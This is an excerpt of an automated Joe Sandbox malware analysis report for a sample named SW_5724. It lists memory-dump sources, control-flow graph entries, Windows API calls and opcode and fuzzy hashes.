                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: b67dcd7fdabc7bac037c8ff5285430ec9bafcc2adf72283b150a6d09d67f6136
                                                                                  • Instruction ID: febe1dd7cd6ef95d47607fb300ccef7304595a04da23be966419dbdad3b72726
                                                                                  • Opcode Fuzzy Hash: b67dcd7fdabc7bac037c8ff5285430ec9bafcc2adf72283b150a6d09d67f6136
                                                                                  • Instruction Fuzzy Hash: C1713431A0C686CFD7858B68C895AAAFFF1FF46310B16805AD645EB357C7309905CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 8aaf85c07764438d751caf496a9a5ac6c870ab58a1b3d9736ce749b122c28b8b
                                                                                  • Instruction ID: 01fa3ff1ced8758473d661f0d190b117a6ed3f1f8053f1cc65778f41fad622d5
                                                                                  • Opcode Fuzzy Hash: 8aaf85c07764438d751caf496a9a5ac6c870ab58a1b3d9736ce749b122c28b8b
                                                                                  • Instruction Fuzzy Hash: 20711231A0C686CFD785CB68C8946AAFBF1FF56300B1A809AD645AB357C7309D05CB91

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 92631ac04efeaf2a06d91b2eabdb852127d215fdf19ab591467c5c7ab597e9d3
                                                                                  • Instruction ID: 9277cc5b75d11083a6a52818c1773cb9a059bf0a8ef3cd4ac12f93005063a28c
                                                                                  • Opcode Fuzzy Hash: 92631ac04efeaf2a06d91b2eabdb852127d215fdf19ab591467c5c7ab597e9d3
                                                                                  • Instruction Fuzzy Hash: 47713371A0C286CFD785CB69C854AAAFFF1FF56300F1A80AAD645AB357C3308905CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: fcd3aa82cf8754bb4088062b6d4343ddf22f0ef68b2a2db87ea37eb5ee801f26
                                                                                  • Instruction ID: dd108c4aecea444fdf542e9efc3ae75ed0a1a41cb6718c9651a5ec89b8de7b04
                                                                                  • Opcode Fuzzy Hash: fcd3aa82cf8754bb4088062b6d4343ddf22f0ef68b2a2db87ea37eb5ee801f26
                                                                                  • Instruction Fuzzy Hash: 3C714471A0C286CFD7958B68C855AAAFFF1FF86300B1A805AD645EB357C3309905CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 0977e480ddb3cb08662091bd3b8857cbcc26ea810f16aac17715eedf1ccd8ef9
                                                                                  • Instruction ID: f58fb20a86acca42adb130335779dc5deb691b561b4059c05eb56b802c34d0f8
                                                                                  • Opcode Fuzzy Hash: 0977e480ddb3cb08662091bd3b8857cbcc26ea810f16aac17715eedf1ccd8ef9
                                                                                  • Instruction Fuzzy Hash: 44714331A0C686CFD7858B68C8916AAFFF1FF56300B1A81AAD645EB357C7309D05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 44fc1feed583b25e4688c57d36e97b0fef45a95d8fc52d5febe0f6836ad9a33d
                                                                                  • Instruction ID: c7ef9d187c18f9a11c9088adfd8d226b477db7b2e28ea9eba3f259d0d03a21a9
                                                                                  • Opcode Fuzzy Hash: 44fc1feed583b25e4688c57d36e97b0fef45a95d8fc52d5febe0f6836ad9a33d
                                                                                  • Instruction Fuzzy Hash: 6D714331A0C686CFD7858B69C8916AAFFF2FF56300B1A809AD645EB357C7308D05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: b04334347fc1b07dc9ca4561e6677ce8224ba90e92fcba5947bd21a4814b6e37
                                                                                  • Instruction ID: ba5c35c5f346ca71fc9b57a079a5e2f5092095caee3db88f44b4f31543a2b7fa
                                                                                  • Opcode Fuzzy Hash: b04334347fc1b07dc9ca4561e6677ce8224ba90e92fcba5947bd21a4814b6e37
                                                                                  • Instruction Fuzzy Hash: 1B713231A0C686CFD7958B68C8946AAFFF1FF46300B1A805AD646EB357C7309D05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 6b4a07d5c87fd7961495280ff9f936efc099f0cab68912e602f37de59bd20238
                                                                                  • Instruction ID: 56c88ca0f1b0054db9b56ffab57e59e67a5b9b4388efb9f5b0673ac278d31538
                                                                                  • Opcode Fuzzy Hash: 6b4a07d5c87fd7961495280ff9f936efc099f0cab68912e602f37de59bd20238
                                                                                  • Instruction Fuzzy Hash: B2713331A0C686CFD7858B68C8956AAFFF1FF86300B1A805AD645EB357C7309D05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 7319427048f42d76a146229e086fbf77fa3f190b0c7e41bc53d8ca8038709078
                                                                                  • Instruction ID: 01067b3eb266ab21a763c6c8ab4706aec6619c456b63a7696d625dd65c122937
                                                                                  • Opcode Fuzzy Hash: 7319427048f42d76a146229e086fbf77fa3f190b0c7e41bc53d8ca8038709078
                                                                                  • Instruction Fuzzy Hash: 9C714431A0C686CFD7858B69C8556AEFFF1FF96300B1A805AD645EB357C3309905CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 4ea344698a800d903ff3ab54322f6bf87a1df9b3595c7aaad1a2537c47fa7315
                                                                                  • Instruction ID: bef41e0198cfc163fc6f4b85b4f2c8c01b4cb8850620a1858a7db50590450f16
                                                                                  • Opcode Fuzzy Hash: 4ea344698a800d903ff3ab54322f6bf87a1df9b3595c7aaad1a2537c47fa7315
                                                                                  • Instruction Fuzzy Hash: 62513431A0C686CFD7858B69C89166EFBF2FF86300F16806AD246EB356C7349D05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 85a9923b16de35bd55ee3d337daba69e150d15fbfa387eff093a4f27bd19609d
                                                                                  • Instruction ID: dd7c0be2853f5dcbd7d58f9a9ba672e4583b8560f6fc165e99b07a83947c4af2
                                                                                  • Opcode Fuzzy Hash: 85a9923b16de35bd55ee3d337daba69e150d15fbfa387eff093a4f27bd19609d
                                                                                  • Instruction Fuzzy Hash: 85419570B04155CFCB44DFA9C894ABEBAF6FB88300F11812AD506FB351C6359D05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: e77758314042405044da9dbc7073f0ee5843640f83e39a869037600e9c01d64d
                                                                                  • Instruction ID: a43b103fa05b7d65ab1eec1f90acfd66aff1b267767701177c2d3c1f8c6da660
                                                                                  • Opcode Fuzzy Hash: e77758314042405044da9dbc7073f0ee5843640f83e39a869037600e9c01d64d
                                                                                  • Instruction Fuzzy Hash: 5341A470B14159CFCB44DFA9C894A7EBAF6FB88310F11802AD606FB390C6359D05CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 851c79b276a19f5103f086c0bb6115dbc8e78106552d10d69761407fa58d5ea4
                                                                                  • Instruction ID: b1a4e3238bde4ae0481110a0452629c4401b4a22215d7f805fde264cd9122022
                                                                                  • Opcode Fuzzy Hash: 851c79b276a19f5103f086c0bb6115dbc8e78106552d10d69761407fa58d5ea4
                                                                                  • Instruction Fuzzy Hash: 07C1327260CA92CBD3A58F28C881976BBA0FF11310769A55ACF11AB753C370ED55CF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2c1fc0fe292d05464fcaa32d6cf6ce349324b8133134ead96967b3efb3cf534b
                                                                                  • Instruction ID: a85b017d4d38cf09569ef0c968a9142d6188c6990147534a64dec8114a9de43e
                                                                                  • Opcode Fuzzy Hash: 2c1fc0fe292d05464fcaa32d6cf6ce349324b8133134ead96967b3efb3cf534b
                                                                                  • Instruction Fuzzy Hash: D771D330608216CFC384DF68D5C4D7ABBA5BB44300B629856EF12EB7A2C771ED51CBA5
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 027F9119
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 9fc1807bc3014b541d17ed75f0a58888b8a0fb634d816f7c353fc7d2db47c788
                                                                                  • Instruction ID: dbcf49e4727d2ac5ca343ec45447135e562df79ade65681cd9eb27eff5f0c4f4
                                                                                  • Opcode Fuzzy Hash: 9fc1807bc3014b541d17ed75f0a58888b8a0fb634d816f7c353fc7d2db47c788
                                                                                  • Instruction Fuzzy Hash: BF41CFB0C04619CFDB24CFA9C884BDEBBB6BF49314F20806AD508AB355DB766945CF90
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 027F9119
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 31a72494ebe5a3800b5ac19ec73168b3bce5381b916480f6b9f5c6844c18defc
                                                                                  • Instruction ID: da8e8615ee5333e22827418aa8554d6192b6903c0e12f90a63d158b7bcd70d77
                                                                                  • Opcode Fuzzy Hash: 31a72494ebe5a3800b5ac19ec73168b3bce5381b916480f6b9f5c6844c18defc
                                                                                  • Instruction Fuzzy Hash: 7A41D1B4C04619CFDB24DFA9C844BDEBBB5BF49304F20806AD508AB355DBB56945CF90
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 027FE85E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 94e4049ee433aa225e6a8353c79e27ab0cf58cb629b48b09036472d5324c6906
                                                                                  • Instruction ID: 19f12a2a3247de05f67e49842a6b9d8fd4c39e4009353c0f7a342326f327e499
                                                                                  • Opcode Fuzzy Hash: 94e4049ee433aa225e6a8353c79e27ab0cf58cb629b48b09036472d5324c6906
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6b{T$KWe?
                                                                                  • API String ID: 0-4023851026

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:5%
                                                                                  Signature Coverage:9.4%
                                                                                  Total number of Nodes:139
                                                                                  Total number of Limit Nodes:8

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 119 417913-41793c call 42f5f3 123 417942-417950 call 42fbf3 119->123 124 41793e-417941 119->124 127 417960-417971 call 42e093 123->127 128 417952-41795d call 42fe93 123->128 133 417973-417987 LdrLoadDll 127->133 134 41798a-41798d 127->134 128->127 133->134
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                                  • Instruction ID: af326da7c132db295e391ced85ce7770f3b587b3f31b4282422e345026d71ec0
                                                                                  • Opcode Fuzzy Hash: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                                  • Instruction Fuzzy Hash: C50152B1E4010DABDF10DAA5DC42FDEB778AB14308F4041A6F90897241F679EB488B95

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 42c903-42c93c call 4046f3 call 42db83 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C937
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction ID: cb036ad0cdd716a926f083ad66e86339c7f4d5c2c0d3a14b9e6433a91f40aa26
                                                                                  • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction Fuzzy Hash: 07E04F752006147BC610EA5AEC01F9B775CDBC5714F404419FB48A7281C6B5791186F8

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 154 1a92b60-1a92b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fb91bc7d660c2e8a28d8bb02333caa7e6c26527afbd74e8db647d5a2675b965d
                                                                                  • Instruction ID: 7acac22f01cc0f8d72d9cf6b4edde788db157665adefecc0439704e112a44219
                                                                                  • Opcode Fuzzy Hash: fb91bc7d660c2e8a28d8bb02333caa7e6c26527afbd74e8db647d5a2675b965d
                                                                                  • Instruction Fuzzy Hash: 379002B170240003410671984424616400A97E0202F96C021E1014690DC62989916225

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 156 1a92df0-1a92dfc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8f59a723914b06bb74cb930c4afd973cfebd05d496dbac2ef0530e129f76aa96
                                                                                  • Instruction ID: d1ef941751286cae8e04b6be0229f0aba81b896abc36d07da8da68f172ec6090
                                                                                  • Opcode Fuzzy Hash: 8f59a723914b06bb74cb930c4afd973cfebd05d496dbac2ef0530e129f76aa96
                                                                                  • Instruction Fuzzy Hash: 3690027170140413D11271984514707000997D0242FD6C412A0424658DD75A8A52A221

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 155 1a92c70-1a92c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 157 1a935c0-1a935cc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 4140de-4140e1 1 4140e4-4140ee 0->1 2 414138-414142 0->2 5 4140f0 1->5 6 414126-41412c 1->6 3 414144-414157 2->3 4 41419c-4141cd call 4046a3 call 425063 2->4 7 41418c-41419b call 417913 3->7 28 4141ed-4141f3 4->28 29 4141cf-4141de PostThreadMessageW 4->29 10 4140f1-414109 5->10 6->7 8 41412e-414131 6->8 7->4 11 414133-414134 8->11 12 4140be-4140cc 8->12 15 41410c 10->15 11->2 16 41409d-4140ac 12->16 17 4140ce-4140dd 12->17 20 41410d-414112 15->20 26 414051-414052 16->26 27 414054-414075 16->27 17->0 17->20 21 414114-414115 20->21 22 4140ba-4140bc 20->22 21->6 22->12 22->15 26->27 31 414077-414078 27->31 32 414086-414094 27->32 29->28 30 4141e0-4141ea 29->30 30->28 31->10 33 41407a-414084 31->33 32->16 33->32
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 0-962170130

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 34 414119-414124 35 414126-41412c 34->35 36 41418d-41419b call 417913 34->36 37 41418c 35->37 38 41412e-414131 35->38 46 41419c-4141cd call 4046a3 call 425063 36->46 37->36 40 414133-414134 38->40 41 4140be-4140cc 38->41 43 414138-414142 40->43 44 41409d-4140ac 41->44 45 4140ce-4140dd 41->45 43->46 47 414144-414157 43->47 52 414051-414052 44->52 53 414054-414075 44->53 49 41410d-414112 45->49 50 4140de-4140e1 45->50 66 4141ed-4141f3 46->66 67 4141cf-4141de PostThreadMessageW 46->67 47->37 54 414114-414115 49->54 55 4140ba-4140bc 49->55 50->43 56 4140e4-4140ee 50->56 52->53 58 414077-414078 53->58 59 414086-414094 53->59 54->35 55->41 60 41410c 55->60 56->35 61 4140f0 56->61 63 4140f1-414109 58->63 64 41407a-414084 58->64 59->44 60->49 61->63 63->60 64->59 67->66 68 4141e0-4141ea 67->68 68->66
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 69 414163-414195 call 42eab3 call 42f4c3 74 41419b-4141cd call 4046a3 call 425063 69->74 75 414196 call 417913 69->75 81 4141ed-4141f3 74->81 82 4141cf-4141de PostThreadMessageW 74->82 75->74 82->81 83 4141e0-4141ea 82->83 83->81
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 84 42cc93-42ccd4 call 4046f3 call 42db83 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CCCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: dfA
                                                                                  • API String ID: 3298025750-2195916745

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 98 417993-4179a8 99 417951-417957 98->99 100 4179aa-4179b0 98->100 101 41795d-417971 call 42e093 99->101 102 417958 call 42fe93 99->102 103 4179b2-4179dc 100->103 104 4179dd 100->104 111 41798a-41798d 101->111 117 417973-417987 LdrLoadDll 101->117 102->101 103->104 106 417989 104->106 107 4179df-4179e8 104->107 106->111 108 4179ea-417a1e 107->108 109 417a4c-417a4f 107->109 112 417ab1-417ace call 42b8c3 109->112 113 417a51-417a57 109->113 113->112 117->111
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 135 42cc43-42cc87 call 4046f3 call 42db83 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041E731,?,?,00000000,?,0041E731,?,?,?), ref: 0042CC82
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 145 42cce3-42cd1c call 4046f3 call 42db83 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,2CB6EB11,?,?,2CB6EB11), ref: 0042CD17
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
